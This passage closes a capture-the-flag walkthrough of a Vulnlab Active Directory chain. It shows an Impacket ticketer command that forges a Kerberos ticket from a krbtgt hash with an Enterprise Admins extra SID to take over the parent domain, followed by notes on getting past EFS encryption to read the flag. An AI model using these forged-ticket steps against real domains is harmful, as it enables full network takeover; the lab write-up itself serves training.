$ ticketer.py -nthash "c7a03c565c6<REDACTED>" -domain lab.trusted.vl -domain-sid S-1-5-21-2241985869-2159962460-1278545866 -extra-sid S-1-5-21-3576695518-347000760-3731839591-519 Administrator
Impacket v0.13.0.dev0+20241210.172718.365fccfc - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for lab.trusted.vl/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncAsRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncASRepPart
[*] Saving ticket in Administrator.ccache
ticketer arguments
-nthash: is where we put the nt hash of krbtgt-domain: here we put the FQDN of child domain-domain-sid: here we put the SID of child domain-extra-sid: here we put the SID of parent domain, with the RID of Enterprise AdminsAdministrator: here we put the user we want to use, it can be anything.
We have now full access to the domain controller of trusted.vl. We can use psexec to connect and grab the flag, but there’s a trick here.
EFS Encryption
If we try to read the flag, we have an access denied. It is because the file is encrypted using EFS.
If we enumerate the file using cipher command, we can see that only Administrator can read it :
c:\Users\Administrator\Desktop> cipher /C root.txt
Listing c:\Users\Administrator\Desktop\
New files added to this directory will be encrypted.
E root.txt
Compatibility Level:
Windows XP/Server 2003
Users who can decrypt:
TRUSTED\Administrator [Administrator(Administrator@TRUSTED)]
Certificate thumbprint: FFA5 6CDD 0797 CFD7 AA58 C004 2368 67D3 1B75 1553
Recovery Certificates:
TRUSTED\Administrator [administrator(administrator@TRUSTED)]
Certificate thumbprint: 1FB2 6DE1 F581 0571 F3DD 879B F1D5 B72C B481 C6DA
Key information cannot be retrieved.
The specified file could not be decrypted.
To read this file, we need to have an interactive session. It means we have to connect through RDP, or we can use RunasCS as TRUSTED\Administrator.
Thank you for reading this walkthrough, I hope you had a good time and learned new tricks and techniques. I really loved this chain ! I mean, I think I love every machines from vulnlab, it’s really a top tier plateform.